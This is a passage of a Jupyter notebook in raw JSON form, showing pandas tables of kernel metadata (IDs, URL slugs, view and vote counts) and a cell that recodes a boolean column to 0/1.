" <td>69316.0</td>\n",
" <td>6659016.0</td>\n",
" <td>0.0</td>\n",
" <td>how-to-score-0-0255-0-0245-top-10-score</td>\n",
" <td>NaN</td>\n",
" <td>552</td>\n",
" <td>2</td>\n",
" <td>10</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201974</th>\n",
" <td>1916366</td>\n",
" <td>2225268</td>\n",
" <td>6670628.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657409.0</td>\n",
" <td>0.0</td>\n",
" <td>house-price-xgboost</td>\n",
" <td>NaN</td>\n",
" <td>11</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201975</th>\n",
" <td>1916461</td>\n",
" <td>2080166</td>\n",
" <td>6657685.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657685.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-sentiment-analysis-f08e9d52-d</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201976</th>\n",
" <td>1916539</td>\n",
" <td>1162757</td>\n",
" <td>6659497.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6659320.0</td>\n",
" <td>0.0</td>\n",
" <td>mnist-with-fastai-style</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201977</th>\n",
" <td>1916566</td>\n",
" <td>1270421</td>\n",
" <td>6658657.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6658657.0</td>\n",
" <td>0.0</td>\n",
" <td>a-begining-try</td>\n",
" <td>NaN</td>\n",
" <td>31</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201978</th>\n",
" <td>1916572</td>\n",
" <td>2373215</td>\n",
" <td>6658820.0</td>\n",
" <td>1847749.0</td>\n",
" <td>NaN</td>\n",
" <td>6658820.0</td>\n",
" <td>0.0</td>\n",
" <td>getting-started-in-r-first-steps-337898</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201979</th>\n",
" <td>1916595</td>\n",
" <td>2355967</td>\n",
" <td>6658417.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6658388.0</td>\n",
" <td>0.0</td>\n",
" <td>my-first-data-science-homework</td>\n",
" <td>NaN</td>\n",
" <td>70</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201980</th>\n",
" <td>1916605</td>\n",
" <td>1977282</td>\n",
" <td>6818544.0</td>\n",
" <td>NaN</td>\n",
" <td>69150.0</td>\n",
" <td>6660859.0</td>\n",
" <td>0.0</td>\n",
" <td>u-s-democrat-and-republican-tweet-exploration</td>\n",
" <td>NaN</td>\n",
" <td>82</td>\n",
" <td>2</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" </tbody>\n",
"</table>\n",
"<p>201981 rows × 13 columns</p>\n",
"</div>"
],
"text/plain": [
" Id AuthorUserId CurrentKernelVersionId \\\n",
"0 1 2505 205.0 \n",
"1 2 3716 1748.0 \n",
"2 4 3716 41.0 \n",
"3 5 28963 19.0 \n",
"4 6 3716 21.0 \n",
"5 7 3716 48.0 \n",
"6 9 3716 50.0 \n",
"7 11 3716 373.0 \n",
"8 12 993 6467.0 \n",
"9 13 993 6468.0 \n",
"10 14 993 269065.0 \n",
"11 15 993 520.0 \n",
"12 16 993 154.0 \n",
"13 17 993 649.0 \n",
"14 20 993 803.0 \n",
"15 21 993 1227.0 \n",
"16 22 206545 190.0 \n",
"17 23 114978 193.0 \n",
"18 24 114978 308.0 \n",
"19 25 993 213.0 \n",
"20 26 993 212.0 \n",
"21 27 993 294.0 \n",
"22 29 114978 238.0 \n",
"23 30 9679 236.0 \n",
"24 31 185835 261.0 \n",
"25 32 19605 244.0 \n",
"26 33 319768 253.0 \n",
"27 34 28963 19064.0 \n",
"28 35 320040 264.0 \n",
"29 39 319893 552.0 \n",
"... ... ... ... \n",
"201951 1875333 442623 6498125.0 \n",
"201952 1875398 1497793 6497141.0 \n",
"201953 1875414 2080166 6494175.0 \n",
"201954 1875417 1776773 6499806.0 \n",
"201955 1915910 498422 6657552.0 \n",
"201956 1915916 2080166 6655493.0 \n",
"201957 1915988 1660833 6656526.0 \n",
"201958 1916035 1179427 6661990.0 \n",
"201959 1916052 1828058 6730922.0 \n",
"201960 1916057 1601569 6730437.0 \n",
"201961 1916068 1267737 6656222.0 \n",
"201962 1916091 756325 6656455.0 \n",
"201963 1916101 1090244 6690675.0 \n",
"201964 1916124 1170777 6805081.0 \n",
"201965 1916181 2386017 6660035.0 \n",
"201966 1916199 2108937 6938214.0 \n",
"201967 1916215 637434 6904698.0 \n",
"201968 1916243 885589 6895750.0 \n",
"201969 1916268 1113072 6941531.0 \n",
"201970 1916283 885589 6684908.0 \n",
"201971 1916285 885589 6681010.0 \n",
"201972 1916310 2080166 6657002.0 \n",
"201973 1916350 2092403 6671885.0 \n",
"201974 1916366 2225268 6670628.0 \n",
"201975 1916461 2080166 6657685.0 \n",
"201976 1916539 1162757 6659497.0 \n",
"201977 1916566 1270421 6658657.0 \n",
"201978 1916572 2373215 6658820.0 \n",
"201979 1916595 2355967 6658417.0 \n",
"201980 1916605 1977282 6818544.0 \n",
"\n",
" ForkParentKernelVersionId ForumTopicId FirstKernelVersionId \\\n",
"0 NaN NaN 1.0 \n",
"1 NaN 26670.0 2.0 \n",
"2 NaN NaN 9.0 \n",
"3 NaN NaN 13.0 \n",
"4 NaN NaN 15.0 \n",
"5 NaN NaN 27.0 \n",
"6 NaN NaN 49.0 \n",
"7 NaN NaN 54.0 \n",
"8 NaN NaN 55.0 \n",
"9 NaN NaN 73.0 \n",
"10 NaN 14925.0 77.0 \n",
"11 NaN 20068.0 140.0 \n",
"12 NaN NaN 141.0 \n",
"13 NaN 18337.0 155.0 \n",
"14 NaN NaN 171.0 \n",
"15 NaN 17462.0 185.0 \n",
"16 NaN NaN 188.0 \n",
"17 NaN NaN 191.0 \n",
"18 NaN NaN 194.0 \n",
"19 NaN NaN 209.0 \n",
"20 NaN NaN 212.0 \n",
"21 NaN 35477.0 214.0 \n",
"22 NaN NaN 216.0 \n",
"23 NaN NaN 236.0 \n",
"24 NaN NaN 239.0 \n",
"25 NaN NaN 244.0 \n",
"26 NaN NaN 253.0 \n",
"27 NaN NaN 262.0 \n",
"28 NaN NaN 263.0 \n",
"29 NaN NaN 321.0 \n",
"... ... ... ... \n",
"201951 NaN NaN 6495275.0 \n",
"201952 2395222.0 NaN 6497049.0 \n",
"201953 NaN NaN 6494175.0 \n",
"201954 NaN NaN 6498408.0 \n",
"201955 6528403.0 NaN 6655666.0 \n",
"201956 NaN NaN 6655493.0 \n",
"201957 NaN NaN 6655878.0 \n",
"201958 NaN NaN 6661990.0 \n",
"201959 NaN NaN 6656151.0 \n",
"201960 6633328.0 NaN 6668207.0 \n",
"201961 NaN NaN 6656222.0 \n",
"201962 NaN 69117.0 6656455.0 \n",
"201963 NaN NaN 6656399.0 \n",
"201964 6632919.0 NaN 6805081.0 \n",
"201965 NaN NaN 6659703.0 \n",
"201966 NaN NaN 6657733.0 \n",
"201967 6600035.0 69362.0 6657640.0 \n",
"201968 6601958.0 NaN 6656920.0 \n",
"201969 NaN 69337.0 6658725.0 \n",
"201970 6601958.0 NaN 6657006.0 \n",
"201971 6601958.0 NaN 6657012.0 \n",
"201972 NaN NaN 6657002.0 \n",
"201973 NaN 69316.0 6659016.0 \n",
"201974 NaN NaN 6657409.0 \n",
"201975 NaN NaN 6657685.0 \n",
"201976 NaN NaN 6659320.0 \n",
"201977 NaN NaN 6658657.0 \n",
"201978 1847749.0 NaN 6658820.0 \n",
"201979 NaN NaN 6658388.0 \n",
"201980 NaN 69150.0 6660859.0 \n",
"\n",
" IsProjectLanguageTemplate \\\n",
"0 0.0 \n",
"1 0.0 \n",
"2 0.0 \n",
"3 0.0 \n",
"4 0.0 \n",
"5 0.0 \n",
"6 0.0 \n",
"7 0.0 \n",
"8 0.0 \n",
"9 0.0 \n",
"10 0.0 \n",
"11 0.0 \n",
"12 0.0 \n",
"13 0.0 \n",
"14 0.0 \n",
"15 0.0 \n",
"16 0.0 \n",
"17 0.0 \n",
"18 0.0 \n",
"19 0.0 \n",
"20 0.0 \n",
"21 0.0 \n",
"22 0.0 \n",
"23 0.0 \n",
"24 0.0 \n",
"25 0.0 \n",
"26 0.0 \n",
"27 0.0 \n",
"28 0.0 \n",
"29 0.0 \n",
"... ... \n",
"201951 0.0 \n",
"201952 0.0 \n",
"201953 0.0 \n",
"201954 0.0 \n",
"201955 0.0 \n",
"201956 0.0 \n",
"201957 0.0 \n",
"201958 0.0 \n",
"201959 0.0 \n",
"201960 0.0 \n",
"201961 0.0 \n",
"201962 0.0 \n",
"201963 0.0 \n",
"201964 0.0 \n",
"201965 0.0 \n",
"201966 0.0 \n",
"201967 0.0 \n",
"201968 0.0 \n",
"201969 0.0 \n",
"201970 0.0 \n",
"201971 0.0 \n",
"201972 0.0 \n",
"201973 0.0 \n",
"201974 0.0 \n",
"201975 0.0 \n",
"201976 0.0 \n",
"201977 0.0 \n",
"201978 0.0 \n",
"201979 0.0 \n",
"201980 0.0 \n",
"\n",
" CurrentUrlSlug Medal TotalViews \\\n",
"0 hello NaN 24 \n",
"1 rf-proximity 3.0 7547 \n",
"2 r-version NaN 9 \n",
"3 test1 NaN 9 \n",
"4 are-icons-missing NaN 7 \n",
"5 testing-version-bolding NaN 13 \n",
"6 testing-version-bolding-with-new-script NaN 2 \n",
"7 as-raster NaN 2 \n",
"8 whoops-doing-this-logged-in-under-my-own-name NaN 6 \n",
"9 installed-packages NaN 6 \n",
"10 installed-r-packages NaN 7921 \n",
"11 example-handwritten-digits 3.0 29080 \n",
"12 mean-digits NaN 9 \n",
"13 pixel-mean-and-variances-by-digit NaN 9989 \n",
"14 random-forest-benchmark-tree-4 NaN 7 \n",
"15 random-forest-benchmark-1 2.0 52294 \n",
"16 dougg-test NaN 164 \n",
"17 some-basic-stats NaN 230 \n",
"18 rotate-all-the-features NaN 2491 \n",
"19 running-system-commands NaN 0 \n",
"20 running-system-commands-1 NaN 84 \n",
"21 we-have-imagemagick-installed NaN 685 \n",
"22 randombananaclassifier NaN 766 \n",
"23 mytest NaN 124 \n",
"24 peek-data NaN 1064 \n",
"25 example-r NaN 337 \n",
"26 testo NaN 58 \n",
"27 python NaN 7 \n",
"28 digit-recognizer NaN 142 \n",
"29 digit-recognizer-using-knn NaN 717 \n",
"... ... ... ... \n",
"201951 project-euler-21 NaN 18 \n",
"201952 ny-stock-price-prediction-rnn-lstm-gru-eb2000 NaN 37 \n",
"201953 starter-banknote-f2165545-1 NaN 0 \n",
"201954 lightgbm-automated-feature-engineering-easy NaN 57 \n",
"201955 a3-demo-decision-trees NaN 29 \n",
"201956 starter-twitter-worlds2018-0cb7d034-3 NaN 3 \n",
"201957 starter-twitter-worlds2018 NaN 39 \n",
"201958 tutorial-linear-regression NaN 22 \n",
"201959 mks-proteins NaN 208 \n",
"201960 exploration-of-f1-dataset-1102f3-aaf5b9 NaN 41 \n",
"201961 fraud-detection NaN 17 \n",
"201962 google-customer-revenue-prediction NaN 239 \n",
"201963 diabeticretinopathyvgg16-finetuning NaN 144 \n",
"201964 protein-atlas-exploration-and-baseline NaN 17 \n",
"201965 01-iris-species NaN 36 \n",
"201966 chicago-crime-investigation NaN 71 \n",
"201967 cnn-128x128x4-keras-from-scratch-lb-0-328 2.0 1808 \n",
"201968 transforma-o-de-vari-veis NaN 117 \n",
"201969 apply-t-sne-on-news 3.0 907 \n",
"201970 redu-o-de-dimensionalidade NaN 43 \n",
"201971 clusteriza-o NaN 33 \n",
"201972 starter-twitter-data-4e7ab639-b NaN 2 \n",
"201973 how-to-score-0-0255-0-0245-top-10-score NaN 552 \n",
"201974 house-price-xgboost NaN 11 \n",
"201975 starter-twitter-sentiment-analysis-f08e9d52-d NaN 4 \n",
"201976 mnist-with-fastai-style NaN 6 \n",
"201977 a-begining-try NaN 31 \n",
"201978 getting-started-in-r-first-steps-337898 NaN 4 \n",
"201979 my-first-data-science-homework NaN 70 \n",
"201980 u-s-democrat-and-republican-tweet-exploration NaN 82 \n",
"\n",
" TotalComments TotalVotes LanguageName \n",
"0 0 0 1 \n",
"1 1 12 1 \n",
"2 0 0 1 \n",
"3 0 0 1 \n",
"4 0 0 1 \n",
"5 0 0 1 \n",
"6 0 0 1 \n",
"7 0 0 1 \n",
"8 0 0 1 \n",
"9 0 0 1 \n",
"10 2 6 1 \n",
"11 8 36 1 \n",
"12 0 0 1 \n",
"13 5 8 1 \n",
"14 0 0 1 \n",
"15 23 91 1 \n",
"16 0 0 1 \n",
"17 0 0 1 \n",
"18 0 4 1 \n",
"19 0 0 1 \n",
"20 0 0 1 \n",
"21 1 0 1 \n",
"22 0 1 1 \n",
"23 0 0 1 \n",
"24 0 0 1 \n",
"25 0 0 1 \n",
"26 0 0 1 \n",
"27 0 0 1 \n",
"28 0 0 1 \n",
"29 0 0 1 \n",
"... ... ... ... \n",
"201951 0 1 2 \n",
"201952 0 0 2 \n",
"201953 0 0 2 \n",
"201954 0 1 2 \n",
"201955 0 0 2 \n",
"201956 0 0 2 \n",
"201957 0 1 2 \n",
"201958 0 0 2 \n",
"201959 0 0 1 \n",
"201960 0 0 2 \n",
"201961 0 0 2 \n",
"201962 3 3 2 \n",
"201963 0 1 2 \n",
"201964 0 0 2 \n",
"201965 0 1 2 \n",
"201966 0 0 2 \n",
"201967 15 36 2 \n",
"201968 0 13 2 \n",
"201969 7 15 2 \n",
"201970 0 1 2 \n",
"201971 0 1 2 \n",
"201972 0 0 2 \n",
"201973 2 10 2 \n",
"201974 0 0 2 \n",
"201975 0 0 2 \n",
"201976 0 0 2 \n",
"201977 0 0 2 \n",
"201978 0 0 1 \n",
"201979 0 2 2 \n",
"201980 2 4 1 \n",
"\n",
"[201981 rows x 13 columns]"
]
},
"execution_count": 19,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
    "# Convert IsProjectLanguageTemplate from boolean to a numeric dtype (0/1).\n",
    "# Use .loc for the assignment: chained indexing (df.col[mask] = value) can\n",
    "# silently write to a copy and raises pandas' SettingWithCopyWarning.\n",
    "df.loc[df.IsProjectLanguageTemplate == False, 'IsProjectLanguageTemplate'] = 0\n",
    "df.loc[df.IsProjectLanguageTemplate == True, 'IsProjectLanguageTemplate'] = 1\n",
"\n",
"df\n"
]
},
{
"cell_type": "code",
"execution_count": 21,
"metadata": {},
"outputs": [
{
"data": {
"text/html": [
"<div>\n",
"<style scoped>\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"</style>\n",
"<table border=\"1\" class=\"dataframe\">\n",
" <thead>\n",
" <tr style=\"text-align: right;\">\n",
" <th></th>\n",
" <th>Id</th>\n",
" <th>AuthorUserId</th>\n",
" <th>CurrentKernelVersionId</th>\n",
" <th>ForkParentKernelVersionId</th>\n",
" <th>ForumTopicId</th>\n",
" <th>FirstKernelVersionId</th>\n",
" <th>IsProjectLanguageTemplate</th>\n",
" <th>CurrentUrlSlug</th>\n",
" <th>Medal</th>\n",
" <th>TotalViews</th>\n",
" <th>TotalComments</th>\n",
" <th>TotalVotes</th>\n",
" <th>LanguageName</th>\n",
" </tr>\n",
" </thead>\n",
" <tbody>\n",
" <tr>\n",
" <th>0</th>\n",
" <td>1</td>\n",
" <td>2505</td>\n",
" <td>205.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>1.0</td>\n",
" <td>0.0</td>\n",
" <td>hello</td>\n",
" <td>NaN</td>\n",
" <td>24</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>1</th>\n",
" <td>2</td>\n",
" <td>3716</td>\n",
" <td>1748.0</td>\n",
" <td>NaN</td>\n",
" <td>26670.0</td>\n",
" <td>2.0</td>\n",
" <td>0.0</td>\n",
" <td>rf-proximity</td>\n",
" <td>3.0</td>\n",
" <td>7547</td>\n",
" <td>1</td>\n",
" <td>12</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>2</th>\n",
" <td>4</td>\n",
" <td>3716</td>\n",
" <td>41.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>9.0</td>\n",
" <td>0.0</td>\n",
" <td>r-version</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>3</th>\n",
" <td>5</td>\n",
" <td>28963</td>\n",
" <td>19.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>13.0</td>\n",
" <td>0.0</td>\n",
" <td>test1</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>4</th>\n",
" <td>6</td>\n",
" <td>3716</td>\n",
" <td>21.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>15.0</td>\n",
" <td>0.0</td>\n",
" <td>are-icons-missing</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>5</th>\n",
" <td>7</td>\n",
" <td>3716</td>\n",
" <td>48.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>27.0</td>\n",
" <td>0.0</td>\n",
" <td>testing-version-bolding</td>\n",
" <td>NaN</td>\n",
" <td>13</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>6</th>\n",
" <td>9</td>\n",
" <td>3716</td>\n",
" <td>50.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>49.0</td>\n",
" <td>0.0</td>\n",
" <td>testing-version-bolding-with-new-script</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>7</th>\n",
" <td>11</td>\n",
" <td>3716</td>\n",
" <td>373.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>54.0</td>\n",
" <td>0.0</td>\n",
" <td>as-raster</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>8</th>\n",
" <td>12</td>\n",
" <td>993</td>\n",
" <td>6467.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>55.0</td>\n",
" <td>0.0</td>\n",
" <td>whoops-doing-this-logged-in-under-my-own-name</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>9</th>\n",
" <td>13</td>\n",
" <td>993</td>\n",
" <td>6468.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>73.0</td>\n",
" <td>0.0</td>\n",
" <td>installed-packages</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>10</th>\n",
" <td>14</td>\n",
" <td>993</td>\n",
" <td>269065.0</td>\n",
" <td>NaN</td>\n",
" <td>14925.0</td>\n",
" <td>77.0</td>\n",
" <td>0.0</td>\n",
" <td>installed-r-packages</td>\n",
" <td>NaN</td>\n",
" <td>7921</td>\n",
" <td>2</td>\n",
" <td>6</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>11</th>\n",
" <td>15</td>\n",
" <td>993</td>\n",
" <td>520.0</td>\n",
" <td>NaN</td>\n",
" <td>20068.0</td>\n",
" <td>140.0</td>\n",
" <td>0.0</td>\n",
" <td>example-handwritten-digits</td>\n",
" <td>3.0</td>\n",
" <td>29080</td>\n",
" <td>8</td>\n",
" <td>36</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>12</th>\n",
" <td>16</td>\n",
" <td>993</td>\n",
" <td>154.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>141.0</td>\n",
" <td>0.0</td>\n",
" <td>mean-digits</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>13</th>\n",
" <td>17</td>\n",
" <td>993</td>\n",
" <td>649.0</td>\n",
" <td>NaN</td>\n",
" <td>18337.0</td>\n",
" <td>155.0</td>\n",
" <td>0.0</td>\n",
" <td>pixel-mean-and-variances-by-digit</td>\n",
" <td>NaN</td>\n",
" <td>9989</td>\n",
" <td>5</td>\n",
" <td>8</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>14</th>\n",
" <td>20</td>\n",
" <td>993</td>\n",
" <td>803.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>171.0</td>\n",
" <td>0.0</td>\n",
" <td>random-forest-benchmark-tree-4</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>15</th>\n",
" <td>21</td>\n",
" <td>993</td>\n",
" <td>1227.0</td>\n",
" <td>NaN</td>\n",
" <td>17462.0</td>\n",
" <td>185.0</td>\n",
" <td>0.0</td>\n",
" <td>random-forest-benchmark-1</td>\n",
" <td>2.0</td>\n",
" <td>52294</td>\n",
" <td>23</td>\n",
" <td>91</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>16</th>\n",
" <td>22</td>\n",
" <td>206545</td>\n",
" <td>190.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>188.0</td>\n",
" <td>0.0</td>\n",
" <td>dougg-test</td>\n",
" <td>NaN</td>\n",
" <td>164</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>17</th>\n",
" <td>23</td>\n",
" <td>114978</td>\n",
" <td>193.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>191.0</td>\n",
" <td>0.0</td>\n",
" <td>some-basic-stats</td>\n",
" <td>NaN</td>\n",
" <td>230</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>18</th>\n",
" <td>24</td>\n",
" <td>114978</td>\n",
" <td>308.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>194.0</td>\n",
" <td>0.0</td>\n",
" <td>rotate-all-the-features</td>\n",
" <td>NaN</td>\n",
" <td>2491</td>\n",
" <td>0</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>19</th>\n",
" <td>25</td>\n",
" <td>993</td>\n",
" <td>213.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>209.0</td>\n",
" <td>0.0</td>\n",
" <td>running-system-commands</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>20</th>\n",
" <td>26</td>\n",
" <td>993</td>\n",
" <td>212.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>212.0</td>\n",
" <td>0.0</td>\n",
" <td>running-system-commands-1</td>\n",
" <td>NaN</td>\n",
" <td>84</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>21</th>\n",
" <td>27</td>\n",
" <td>993</td>\n",
" <td>294.0</td>\n",
" <td>NaN</td>\n",
" <td>35477.0</td>\n",
" <td>214.0</td>\n",
" <td>0.0</td>\n",
" <td>we-have-imagemagick-installed</td>\n",
" <td>NaN</td>\n",
" <td>685</td>\n",
" <td>1</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>22</th>\n",
" <td>29</td>\n",
" <td>114978</td>\n",
" <td>238.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>216.0</td>\n",
" <td>0.0</td>\n",
" <td>randombananaclassifier</td>\n",
" <td>NaN</td>\n",
" <td>766</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>23</th>\n",
" <td>30</td>\n",
" <td>9679</td>\n",
" <td>236.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>236.0</td>\n",
" <td>0.0</td>\n",
" <td>mytest</td>\n",
" <td>NaN</td>\n",
" <td>124</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>24</th>\n",
" <td>31</td>\n",
" <td>185835</td>\n",
" <td>261.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>239.0</td>\n",
" <td>0.0</td>\n",
" <td>peek-data</td>\n",
" <td>NaN</td>\n",
" <td>1064</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>25</th>\n",
" <td>32</td>\n",
" <td>19605</td>\n",
" <td>244.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>244.0</td>\n",
" <td>0.0</td>\n",
" <td>example-r</td>\n",
" <td>NaN</td>\n",
" <td>337</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>26</th>\n",
" <td>33</td>\n",
" <td>319768</td>\n",
" <td>253.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>253.0</td>\n",
" <td>0.0</td>\n",
" <td>testo</td>\n",
" <td>NaN</td>\n",
" <td>58</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>27</th>\n",
" <td>34</td>\n",
" <td>28963</td>\n",
" <td>19064.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>262.0</td>\n",
" <td>0.0</td>\n",
" <td>python</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>28</th>\n",
" <td>35</td>\n",
" <td>320040</td>\n",
" <td>264.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>263.0</td>\n",
" <td>0.0</td>\n",
" <td>digit-recognizer</td>\n",
" <td>NaN</td>\n",
" <td>142</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>29</th>\n",
" <td>39</td>\n",
" <td>319893</td>\n",
" <td>552.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>321.0</td>\n",
" <td>0.0</td>\n",
" <td>digit-recognizer-using-knn</td>\n",
" <td>NaN</td>\n",
" <td>717</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>...</th>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201951</th>\n",
" <td>1875333</td>\n",
" <td>442623</td>\n",
" <td>6498125.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6495275.0</td>\n",
" <td>0.0</td>\n",
" <td>project-euler-21</td>\n",
" <td>NaN</td>\n",
" <td>18</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201952</th>\n",
" <td>1875398</td>\n",
" <td>1497793</td>\n",
" <td>6497141.0</td>\n",
" <td>2395222.0</td>\n",
" <td>0.0</td>\n",
" <td>6497049.0</td>\n",
" <td>0.0</td>\n",
" <td>ny-stock-price-prediction-rnn-lstm-gru-eb2000</td>\n",
" <td>NaN</td>\n",
" <td>37</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201953</th>\n",
" <td>1875414</td>\n",
" <td>2080166</td>\n",
" <td>6494175.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6494175.0</td>\n",
